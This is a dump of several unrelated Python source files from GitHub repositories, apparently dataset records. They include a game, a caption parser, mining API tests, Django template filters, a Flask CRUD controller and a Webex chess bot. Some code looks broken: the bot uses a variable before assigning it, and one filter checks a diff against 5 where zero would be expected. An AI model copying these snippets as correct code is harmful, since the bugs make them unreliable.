#pk.dump(mean, open('mean.sav', 'wb'))\n    #pk.dump(var, open('var.sav', 'wb'))\n    #print(test)\n    #print(mean)\n    #print(var)\n\n    sys.exit(0)\n","repo_name":"regisaiah/ECE-499---Classifier","sub_path":"mentalfatigue.py","file_name":"mentalfatigue.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15809668780","text":"\r\nimport random\r\n\r\nclass Game(): #class game with four methods\r\n    \r\n    def __init__(self):\r\n        self.user_item = self.get_user_item()\r\n        self.computer_item = self.get_computer_item()\r\n        self.winner = self.get_game_result()\r\n        \r\n    @staticmethod\r\n    def get_user_item(): #method to get user input\r\n        \r\n        user_item = input(\"Choose between (rock/paper/scissors) \\n\")\r\n        first_choice = [\"rock\",\"paper\",\"scissors\"]\r\n        \r\n        # re-prompt until the input is one of the valid options\r\n        while user_item not in first_choice:\r\n            user_item = input(\"Choose between (rock/paper/scissors) \\n\")\r\n        return user_item\r\n    @staticmethod\r\n    def get_computer_item(): #method for computer choice\r\n        \r\n        second_choice = [\"rock\",\"paper\",\"scissors\"]\r\n        computer = random.choice(second_choice)\r\n        return computer\r\n    \r\n    def get_game_result(self): #method to display winner\r\n        if self.user_item == \"rock\" and self.computer_item == \"paper\":\r\n            return \"Computer\"\r\n        if self.user_item == \"rock\" and self.computer_item == \"scissors\":\r\n            return \"User\"\r\n        if self.user_item == \"paper\" and self.computer_item == \"rock\":\r\n            return \"User\"\r\n        if self.user_item == 
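# With GL_FOG_MODE set to GL_LINEAR as above, the fog blending factor for a
# fragment at eye distance z is (end - z) / (end - start), clamped to [0, 1].
# A tiny illustrative helper using the start/end values configured above:
def linear_fog_factor(z, start=20.0, end=60.0):
    f = (end - z) / (end - start)
    return max(0.0, min(1.0, f))  # 1.0 = unfogged, 0.0 = fully fog-colored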
\"scissors\" and self.computer_item == \"rock\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"rock\":\r\n return \"Draw\"\r\n if self.user_item == \"paper\" and self.computer_item == \"scissors\":\r\n return \"Computer\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"paper\":\r\n return \"User\"\r\n if self.user_item == \"paper\" and self.computer_item == \"paper\":\r\n return \"Draw\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"scissors\":\r\n return \"Draw\"\r\n \r\n def play(self): \r\n if self.winner == \"Draw\": \r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} There a tie')\r\n else:\r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} The winner is {self.winner}')\r\n \r\ntest = Game()\r\n\r\n\r\ntest.play()\r\n\r\n\r\n\r\n\r\n\r\n \r\n ","repo_name":"Mengawanji/Dev-Ins","sub_path":"Week 5/day 5/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30627662814","text":"from lxml import etree\nfrom pprint import pprint as pp\n\nfilename = \"CBS_COLBERT_{episode:04d}_CONTENT_CIAN_caption_{kind}.xml\"\nfilepath = \"data/\" + filename\n\nfor i in range(1, 20):\n path = filepath.format(kind=\"DFXP\", episode=i)\n\n tree = etree.parse(path)\n root = tree.getroot()\n\n ns_mapping = {'ns':'http://www.w3.org/ns/ttml'}\n full_text = \" \".join([ptext for ptext in root.xpath('//ns:tt/ns:body/ns:div/ns:p//text()', namespaces=ns_mapping)])\n\n pp(full_text.split(\">>\"))","repo_name":"tsizzle/the-late-show-with-stephen-colbert-analysis","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13948933731","text":"def print2largest(arr, arr_size):\n if (arr_size < 2):\n print(\" Invalid Input \");\n return\n largest = second = -2454635434;\n for i in range(0, arr_size):\n largest = max(largest, arr[i]);\n for i in range(0, arr_size):\n if (arr[i] != largest):\n second = max(second, arr[i])\n \n if (second == -2454635434):\n print(\"There is no second \" +\n \"largest element\")\n else:\n print(\"The second largest \" +\n \"element is \\n\", second)\n \narr = list(map(int,input().split()))\nn = len(arr)\nprint2largest(arr, n)\n","repo_name":"Arshadfaizan/aps-codelibrary","sub_path":"SecondLargest.py","file_name":"SecondLargest.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3609397043","text":"# from mock import patch\nimport datetime\nfrom mock import patch\nfrom tests import BaseCase\nfrom api import mining_api\n\nBDAY_TUPLE = (1982, 9, 2, 16, 30, 0) # yay my birthday\n\n\nclass MiningTestsBase(BaseCase):\n pass\n\n\n# Association RuleSet Tests\n'''\nclass QueryRuleSetEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association RulesSets\n \"\"\"\n def setUp(self):\n super(QueryRuleSetEntitiesTests, self).setUp()\n\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n raise Exception('not yet')\n result = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], 
mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n'''\n\n\nclass CreateRulesetTests(MiningTestsBase):\n\n @patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\n def test_base(self, m_get_id):\n result = mining_api.create_ruleset(.4, .7)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleSetModel))\n self.assertEqual(result.min_confidence, .7)\n self.assertEqual(result.min_support, .4)\n self.assertEqual(result.total_rules, None)\n self.assertTrue(isinstance(result.created_timestamp, datetime.datetime))\n self.assertEqual(result.id, 'mocked_id')\n\n# Association Rule Tests\n\n\nclass RuleModelTests(MiningTestsBase):\n def test_get_rule_item_id(self):\n \"\"\"\n Ensure we can generate a composite pref id for use in txn lists\n representing item and if the session user liked it or not.\n \"\"\"\n\n rule_model = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n\n self.assertEqual(rule_model.generate_rule_key(), 'peanut_butter:0__peanut_butter:1__steak:0')\n\n\nclass QueryRuleEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association Rules\n \"\"\"\n def setUp(self):\n super(QueryRuleEntitiesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n result, cursor, more = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n\n\nclass QueryRuleModelsTests(MiningTestsBase):\n @patch('api.mining_api._query_rule_entities')\n @patch('api.mining_api._populate_rule_model')\n def test_base(self, mock_populate, mock_query):\n # Setup Mocks\n mock_query.return_value = (['a', 'b'], None, False)\n\n # Run Code To Test\n result = mining_api.query_rule_models(limit=4, kwarg=True)\n\n # Check results\n self.assertEqual(result, ([mock_populate.return_value, mock_populate.return_value], None, False))\n mock_query.assert_called_once_with(limit=4, kwarg=True)\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateRuleTest(MiningTestsBase):\n \"\"\"Tests around creating a single AssociationRuleModel\"\"\"\n\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rule('ruleset_id', m)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleModel))\n self.assertEqual(result.ant, ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'])\n self.assertEqual(result.con, ['Cheese:0'])\n self.assertEqual(result.confidence, .85)\n self.assertEqual(result.rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEqual(result.id, 'mocked_id')\n self.assertEqual(result.ruleset_id, 'ruleset_id')\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateMultiTest(MiningTestsBase):\n \"\"\"Tests around creating multiple AssociationRuleModel at once\"\"\"\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m1 = mining_api.AssociationRuleModel(ant, con, 
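# From the expectation asserted in RuleModelTests above, the rule key appears
# to lowercase each antecedent item, replace spaces with underscores, sort,
# and join with '__'; a hedged reconstruction, not the actual mining_api code:
def generate_rule_key(ant):
    return '__'.join(sorted(item.lower().replace(' ', '_') for item in ant))

# generate_rule_key(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'])
# -> 'peanut_butter:0__peanut_butter:1__steak:0'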
.85)\n m2 = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rules('ruleset_id', [m1, m2])\n\n self.assertTrue(isinstance(result, list))\n\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleModel))\n self.assertEqual(result[0].ant, ant)\n self.assertEqual(result[0].con, con)\n self.assertEqual(result[0].confidence, .85)\n self.assertEqual(result[0].rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEquals(result[0].id, 'mocked_id')\n self.assertEqual(result[0].ruleset_id, 'ruleset_id')\n\n self.assertEqual(m_get_id.call_count, 2)\n\n\nclass DeleteRulesTests(MiningTestsBase):\n def setUp(self):\n super(DeleteRulesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n mining_api.create_rules('ruleset_id', [m1])\n\n def base_test(self):\n\n self.assertEqual(1, len(mining_api.query_rule_models()[0]))\n mining_api.delete_rules()\n self.assertEqual(0, len(mining_api.query_rule_models()[0]))\n\n\"\"\"\n\nclass DeleteRulesSinceTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.delete_rules_since()\n\"\"\"\n\n\n\"\"\"\n\nclass RunAprioriTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.run_apriori()\n\"\"\"\n\"\"\"\n\nclass PrintItemsAndRulesTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._print_items_and_rules()\n\n\"\"\"\n\"\"\"\n\nclass PopulateEntityTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._populate_entity()\n\"\"\"\n","repo_name":"divrods/pref-service","sub_path":"tests/api_tests/mining_api_tests.py","file_name":"mining_api_tests.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70883098972","text":"import calendar\nimport datetime\nimport math\n\nfrom collections import defaultdict\n\nfrom django import template\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models.query import QuerySet\nfrom django.utils.safestring import mark_safe\nfrom django.template import defaultfilters\n\nfrom synnefo.lib.ordereddict import OrderedDict\nfrom synnefo.util import units\n\nfrom astakos.im import settings\nfrom astakos.im.models import ProjectResourceGrant, Project\nfrom astakos.im.views import util as views_util\nfrom astakos.im import util\nfrom astakos.im import presentation\nfrom astakos.im.models import AstakosUser\n\nfrom astakos.im import quotas\n\nregister = template.Library()\n\nDELIM = ','\n\n\ndef _is_inf(value):\n try:\n return value == units.PRACTICALLY_INFINITE\n except:\n return False\n\n\n@register.filter\ndef monthssince(joined_date):\n now = datetime.datetime.now()\n date = datetime.datetime(\n year=joined_date.year, month=joined_date.month, day=1)\n months = []\n\n month = date.month\n year = date.year\n timestamp = calendar.timegm(date.utctimetuple())\n\n while date < now:\n months.append((year, month, timestamp))\n\n if date.month < 12:\n month = date.month + 1\n year = date.year\n else:\n month = 1\n year = date.year + 1\n\n date = datetime.datetime(year=year, month=month, day=1)\n timestamp = calendar.timegm(date.utctimetuple())\n\n return months\n\n\n@register.filter\ndef to_unicode(s):\n return unicode(s)\n\n\n@register.filter\ndef to_string(s):\n return str(s)\n\n\n@register.filter\ndef lookup(d, key):\n try:\n return d.get(key)\n except:\n return\n\n\n@register.filter\ndef lookup_uni(d, key):\n return 
d.get(unicode(key))\n\n\n@register.filter\ndef dkeys(d):\n    return d.keys()\n\n\n@register.filter\ndef month_name(month_number):\n    return calendar.month_name[month_number]\n\n\n@register.filter\ndef todate(value, arg=''):\n    secs = int(value) / 1000\n    return datetime.datetime.fromtimestamp(secs)\n\n\n# @register.filter\n# def rcut(value, chars='/'):\n#     return value.rstrip(chars)\n\n\n@register.filter\ndef paginate(l, args):\n    l = l or []\n    page, delim, sorting = args.partition(DELIM)\n    if sorting:\n        if isinstance(l, QuerySet):\n            l = l.order_by(sorting)\n        elif isinstance(l, list):\n            default = ''\n            if sorting.endswith('_date'):\n                default = datetime.datetime.utcfromtimestamp(0)\n            l.sort(key=lambda i: getattr(i, sorting)\n                   if getattr(i, sorting) else default)\n    paginator = Paginator(l, settings.PAGINATE_BY)\n    try:\n        paginator.len\n    except AttributeError:\n        paginator._count = len(list(l))\n\n    try:\n        page_number = int(page)\n    except ValueError:\n        if page == 'last':\n            page_number = paginator.num_pages\n        else:\n            page_number = 1\n    try:\n        page = paginator.page(page_number)\n    except EmptyPage:\n        page = paginator.page(1)\n    return page\n\n\n@register.filter\ndef concat(str1, str2):\n    if not str2:\n        return str(str1)\n    return '%s%s%s' % (str1, DELIM, str2)\n\n\n@register.filter\ndef items(d):\n    if isinstance(d, defaultdict):\n        return d.iteritems()\n    return d\n\n\n@register.filter\ndef get_value_after_dot(value):\n    return value.split(\".\")[1]\n\n# @register.filter\n# def strip_http(value):\n#     return value.replace('http://','')[:-1]\n\n\n@register.filter\ndef truncatename(v, max=18, append=\"...\"):\n    return util.truncatename(v, max, append)\n\n\n@register.filter\ndef selected_resource_groups(project_or_app):\n    if not project_or_app:\n        return []\n\n    grants = project_or_app.resource_set\n    resources = grants.values_list('resource__name', flat=True)\n    return map(lambda r: r.split(\".\")[0], resources)\n\n\n@register.filter\ndef resource_grants(project_or_app):\n    try:\n        grants = project_or_app.resource_set\n        grants = grants.values_list(\n            'resource__name', 'member_capacity', 'project_capacity')\n        return dict((e[0], {'member':e[1], 'project':e[2]}) for e in grants)\n    except:\n        return {}\n\n\ndef get_resource_grant(project_or_app, rname, capacity_for):\n    if project_or_app is None:\n        return None\n\n    resource_set = project_or_app.resource_set\n    if not resource_set.filter(resource__name=rname).count():\n        return None\n\n    resource = resource_set.get(resource__name=rname)\n    return getattr(resource, '%s_capacity' % capacity_for)\n\n\n@register.filter\ndef get_member_resource_grant_value(project_or_app, rname):\n    return get_resource_grant(project_or_app, rname, \"member\")\n\n\n@register.filter\ndef get_project_resource_grant_value(project_or_app, rname):\n    return get_resource_grant(project_or_app, rname, \"project\")\n\n\n@register.filter\ndef resource_diff(r, member_or_project):\n    if not hasattr(r, 'display_project_diff'):\n        return ''\n\n    project, member = r.display_project_diff()\n    diff = dict(zip(['project', 'member'],\n                    r.display_project_diff())).get(member_or_project)\n\n    diff_disp = ''\n    if diff != '':\n        diff_disp = \"(%s)\" % diff\n    tpl = '<span class=\"%s\">%s</span>'\n    cls = 'red' if diff.startswith(\"-\") else 'green'\n    return mark_safe(tpl % (cls, diff_disp))\n\n\n@register.filter\ndef sorted_resources(resources_set):\n    return views_util.sorted_resources(resources_set)\n\n\n@register.filter\ndef display_resource_usage_for_project(resource, project):\n    usage_map = presentation.USAGE_TAG_MAP\n    quota = 
quotas.get_project_quota(project).get(resource.name, None)\n\n    if not quota:\n        return \"No usage\"\n\n    cls = ''\n    usage = quota['project_usage']\n    limit = quota['project_limit']\n\n    if limit == 0 and usage == 0:\n        return \"--\"\n\n    usage_perc = \"%d\" % ((float(usage) / limit) * 100) if limit else \"100\"\n    _keys = usage_map.keys()\n    _keys.reverse()\n    closest = filter(lambda x: int(x) <= int(usage_perc), _keys)[0]\n    cls = usage_map[closest]\n\n    usage_display = units.show(usage, resource.unit)\n    usage_perc_display = \"%s%%\" % usage_perc\n\n    resp = \"\"\"<span class=\"%s\">%s</span> (%s)\"\"\" % \\\n        (cls, usage_perc_display, usage_display)\n    return mark_safe(resp)\n\n\n@register.filter\ndef is_pending_app(app):\n    if not app:\n        return False\n    return app.state in [app.PENDING]\n\n\n@register.filter\ndef is_denied_app(app):\n    if not app:\n        return False\n    return app.state in [app.DENIED]\n\n\ndef _member_policy_formatter(form_or_app, value, changed, mapping):\n    if changed:\n        changed = defaultfilters.title(mapping.get(changed))\n    value = defaultfilters.title(mapping.get(value))\n    return value, changed, None, None\n\n\ndef _owner_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname\n    return value.realname if value else None, changed_name, None, None\n\n\ndef _owner_admin_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname + \" (%s)\" % changed.email\n    return value.realname + \" (%s)\" % value.email if value else None, changed_name, None, None\n\n\ndef _owner_owner_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname\n    return \"Me\", changed_name, None, None\n\n\nMODIFICATION_FORMATTERS = {\n    'member_policy': _member_policy_formatter,\n    'owner': _owner_formatter,\n    'owner_admin': _owner_admin_formatter,\n    'owner_owner': _owner_owner_formatter\n}\n\n\n@register.filter\ndef display_modification_param(form_or_app, param, formatter=None):\n    formatter_name = None\n    if \",\" in param:\n        param, formatter_name = param.split(\",\", 1)\n\n    project_attr = param\n\n    if hasattr(form_or_app, 'instance'):\n        # form\n        project = Project.objects.get(pk=form_or_app.instance.pk)\n        app_value = form_or_app.cleaned_data[param]\n        project_value = getattr(project, project_attr)\n    else:\n        # app\n        project = form_or_app.chain\n        app_value = getattr(form_or_app, project_attr)\n        project_value = getattr(project, project_attr)\n        if app_value is None:\n            app_value = project_value\n\n    formatter_params = {}\n\n    if param == \"member_join_policy\":\n        formatter_name = 'member_policy'\n        formatter_params = {'mapping':\n                            presentation.PROJECT_MEMBER_JOIN_POLICIES}\n\n    if param == \"member_leave_policy\":\n        formatter_name = 'member_policy'\n        formatter_params = {'mapping':\n                            presentation.PROJECT_MEMBER_LEAVE_POLICIES}\n\n    changed = False\n    changed_cls = \"gray details\"\n    if project_value != app_value:\n        changed = project_value\n\n    if not formatter and formatter_name:\n        formatter = MODIFICATION_FORMATTERS.get(formatter_name)\n\n    changed_prefix = \"current: \"\n    if formatter:\n        app_value, changed, cls, prefix = formatter(form_or_app,\n                                                    app_value, changed,\n                                                    **formatter_params)\n        if cls:\n            changed_cls = cls\n\n        if prefix:\n            changed_prefix = prefix\n\n    tpl = \"\"\"%(value)s\"\"\"\n    if changed:\n        tpl += \"\"\" <span class=\"%(changed_cls)s\">\"\"\" + \\\n               \"\"\"%(changed_prefix)s%(changed)s</span>\"\"\"\n\n    if not app_value:\n        app_value = \"(not set)\"\n\n    return mark_safe(tpl % {\n        'value': app_value,\n        
'changed': changed,\n        'changed_cls': changed_cls,\n        'changed_prefix': changed_prefix\n    })\n\n\n@register.filter\ndef display_modification_param_diff(form_or_app, param):\n    def formatter(form_or_app, value, changed):\n        if changed in [None, False]:\n            if _is_inf(value):\n                value = \"Unlimited\"\n            return value, changed, None, \" \"\n\n        to_inf = _is_inf(value)\n        from_inf = _is_inf(changed)\n\n        diff = value - changed\n        sign = \"+\"\n        cls = \"green\"\n        if diff < 0:\n            sign = \"-\"\n            diff = abs(diff)\n            cls = \"red\"\n\n        if diff != 5:\n            if from_inf or to_inf:\n                if from_inf:\n                    changed = \"Unlimited\"\n                diff = \"from %s\" % changed\n            else:\n                diff = sign + str(diff)\n            changed = \"(%s)\" % (diff,)\n        else:\n            changed = None\n\n        if to_inf:\n            value = \"Unlimited\"\n        return value, changed, cls, \" \"\n\n    return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef display_date_modification_param(form_or_app, params):\n    param, date_format = params.split(\",\", 1)\n\n    def formatter(form_or_app, value, changed):\n        if changed not in [None, False]:\n            changed = defaultfilters.date(changed, date_format)\n        formatted_value = defaultfilters.date(value, date_format)\n        return formatted_value, changed, None, None\n\n    return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef inf_display(value):\n    if value == units.PRACTICALLY_INFINITE:\n        return 'Unlimited'\n    return value\n\n\n@register.filter\ndef inf_value_display(value):\n    if value == units.PRACTICALLY_INFINITE:\n        return 'Unlimited'\n    return value\n\n\n@register.filter\ndef project_name_for_user(project, user):\n    return project.display_name_for_user(user)\n\n\n@register.filter\ndef owner_by_uuid(uuid):\n    try:\n        user = AstakosUser.objects.get(uuid=uuid)\n        return \"%s %s (%s)\" % (user.first_name, user.last_name, user.email)\n    except AstakosUser.DoesNotExist:\n        return uuid\n\n\n@register.filter\ndef format_inf(value):\n    if _is_inf(value):\n        return \"Unlimited\"\n    return value\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"15243743884","text":"\"\"\"\n@filename : Student.py\n@description : Implements the controller for the Student table \n@author : 천준홍 (cj562270@gmail.com)\n\"\"\"\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.Students import Student as studentModel\nimport json\nfrom utils.Util import replace_quotes\nfrom utils.Util import get_now_string\n\ndb = SQLAlchemy()\n\n# Class in charge of the JSON endpoints\nclass Student(Resource):\n    def get(self):\n        # Empty variable to hold the query result\n        rs = None\n        name = request.args.get('name')\n        pk = request.args.get('pk')\n\n        # Problem 3 (list lookup by search keyword)\n        if(pk == None):\n            if(name == None):\n                name = ''\n            search = \"%{}%\".format(name)\n            try:\n                # Use LIKE to find names containing the parameter and select only the desired columns\n                rs = studentModel.query.filter(studentModel.name.like(search)).with_entities(studentModel.name, studentModel.grade, studentModel.deptno, studentModel.userid).all()\n            except Exception as e:\n                return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n            \n            # Convert the select result to a dictionary so it can be emitted as JSON\n            dic = []\n            for i,v in enumerate(rs):\n                dic.append({'name': v[0] ,'grade' : v[1] ,'deptno': v[2] ,'userid': v[3]})\n            \n            return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n        # Problem 4 (detail lookup by pk parameter)\n        else:\n            try:\n                rs = 
studentModel.query.filter(studentModel.studno == pk).all()\n            # Print a message on query errors\n            except Exception as e:\n                return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n            \n            # Print an error message when a nonexistent pk value is given\n            if (len(rs) == 0):\n                return 'The given pk value could not be found in the database.'\n            dic = rs[0].to_dict()\n\n            return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n    # Problem 5\n    def post(self):\n        # Receive the values to store as POST parameters\n        name = request.form.get('name')\n        userid = request.form.get('userid')\n        grade = request.form.get('grade')\n        idnum = request.form.get('idnum')\n        birthdate = request.form.get('birthdate')\n        tel = request.form.get('tel')\n        height = request.form.get('height')\n        weight = request.form.get('weight')\n        deptno = request.form.get('deptno')\n        profno = request.form.get('profno')\n        \n        # Bundle the received values into a model object.\n        item = studentModel(name=name, userid=userid,grade=grade, idnum=idnum, birthdate=birthdate, tel=tel, height=height, weight=weight, deptno=deptno, profno=profno)\n        \n        try:\n            # Save (insert)\n            db.session.add(item)\n            # Commit the changes\n            db.session.commit()\n        except Exception as e:\n            # Roll back the changes if an error occurred\n            db.session.rollback()\n            return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n        \n        return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n    \n    # Problem 6\n    def put(self):\n        studno = request.form.get('studno')\n        name = request.form.get('name')\n        userid = request.form.get('userid')\n        grade = request.form.get('grade')\n        idnum = request.form.get('idnum')\n        birthdate = request.form.get('birthdate')\n        tel = request.form.get('tel')\n        height = request.form.get('height')\n        weight = request.form.get('weight')\n        deptno = request.form.get('deptno')\n        profno = request.form.get('profno')\n        \n        # Build a dictionary with only the received parameters (so only those fields are updated)\n        param_list = [name, userid, grade, idnum, birthdate, tel, height, weight, deptno, profno]\n        param_str = ['name','userid','grade','idnum','birthdate','tel','height','weight','deptno','profno']\n        dic = {}\n        for i,v in enumerate(param_list):\n            if (v == None):\n                continue\n            dic[param_str[i]] = v\n\n        # Print an error message when a nonexistent studno (pk) value is given\n        try:\n            rs = studentModel.query.filter(studentModel.studno == studno).all()\n        except Exception as e:\n            return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n        if (len(rs) == 0):\n            return 'The given pk value could not be found in the database.'\n\n        # Perform the update using the dictionary built above\n        try:\n            db.session.query(studentModel).filter(studentModel.studno==studno).update(dic)\n            db.session.commit()\n        # Error handling\n        except Exception as e:\n            db.session.rollback()\n            return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n        \n        return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n    \n    # Problem 7\n    def delete(self):\n        studno = request.form.get('studno')\n        \n        # Print an error message when a nonexistent studno (pk) value is given\n        try:\n            rs = studentModel.query.filter(studentModel.studno == studno).all()\n        except Exception as e:\n            return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n        if (len(rs) == 0):\n            return 'The given pk value could not be found in the database.'\n\n        # Perform the delete keyed on the pk value\n        try:\n            db.session.query(studentModel).filter(studentModel.studno==studno).delete()\n            db.session.commit()\n        # Error handling\n        except Exception as e:\n            db.session.rollback()\n            return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n        \n        return {'rt': 'OK', 'pubDate': get_now_string()}, 
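# The parallel param_list/param_str loop in put() above can be expressed as a
# single dict comprehension over request.form; a hedged alternative sketch
# (field names taken from the model used above):
FIELDS = ('name', 'userid', 'grade', 'idnum', 'birthdate',
          'tel', 'height', 'weight', 'deptno', 'profno')

def collect_update_params(form):
    # keep only the fields the client actually sent
    return {f: form.get(f) for f in FIELDS if form.get(f) is not None}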
200","repo_name":"junhong-CHEON/flask_study","sub_path":"210830-flask문제/controllers/Students.py","file_name":"Students.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29221874273","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfor _ in range(int(input())):\r\n W = input().rstrip()\r\n left, right = [], []\r\n \r\n for s in W:\r\n # <1. 커서를 왼쪽으로 옮기는 경우>\r\n if s == '<' and left:\r\n right.append(left.pop())\r\n # <2. 커서를 오른쪽으로 옮기는 경우> \r\n elif s == '>' and right:\r\n left.append(right.pop())\r\n # <3. 제거하는 경우> \r\n elif s == '-' and left:\r\n left.pop()\r\n # <4. 추가하는 경우> \r\n elif s.isalnum():\r\n left.append(s)\r\n \r\n left.extend(reversed(right)) \r\n print(''.join(left))","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Silver/5397. 키로거/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17839405407","text":"from flask import Flask, request\nimport json\nfrom webexteamssdk import WebexTeamsAPI, Webhook\nimport parser\nfrom helpers import (read_yaml_data,\n get_ngrok_url,\n find_webhook_by_name,\n delete_webhook, create_webhook)\n\nfrom conf import access_token\n\nflask_app = Flask(__name__)\nteams_api = None\n\n@flask_app.route('/teamswebhook', methods=['POST'])\ndef teamswebhook():\n \"\"\"\n Handle \n \"\"\"\n print(\"\\n\" + str(request.method) + \" received\\n\")\n print(request.json)\n\n json_data = request.json\n webhook_obj = Webhook(json_data)\n room = teams_api.rooms.get(webhook_obj.data.roomId)\n message = teams_api.messages.get(webhook_obj.data.id)\n\n # Don't respond to yourself\n if message.personId == teams_api.people.me().id:\n return 'OK'\n else:\n teams_api.messages.create(room.id, text=chess_response)\n person = teams_api.people.get(message.personId)\n \n with open('players.json') as f:\n player_json = f.read()\n\n try:\n board_dest = json.loads(player_json)[0][person]['active']\n except(Exception) as e:\n board_dest = \"board.bd\"\n board_dict = json.loads(player_json)[0]\n board_dict[person]['active'] = board_dest\n with open('players.json', 'w') as f:\n json.dump(board_dict, f)\n \n\n board = parser.Board(dest=board_dest)\n chess_response = parser.parse(board, message)\n\nif __name__ == '__main__':\n\n teams_api = WebexTeamsAPI(access_token=access_token)\n ngrok_url = get_ngrok_url()\n\n webhook_name = 'hello-bot-wb-hook'\n dev_webhook = find_webhook_by_name(teams_api, webhook_name)\n if dev_webhook:\n delete_webhook(teams_api, dev_webhook)\n create_webhook(teams_api, webhook_name, ngrok_url + '/teamswebhook')\n\n flask_app.run(host='0.0.0.0', port=5000)\n","repo_name":"tobyjamez/chesspacito","sub_path":"hello_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20818709619","text":"import threading\n# 定义 个普通的 action 方法,该方法准备作为线程执行体\n\n\ndef action(max1):\n for m in range(max1):\n # 调用 threadi 呵棋块的 cur re 口 t thread ()函��获取当前线程\n # 调用线程对象的 getName ()方法获取当前线程的名字\n 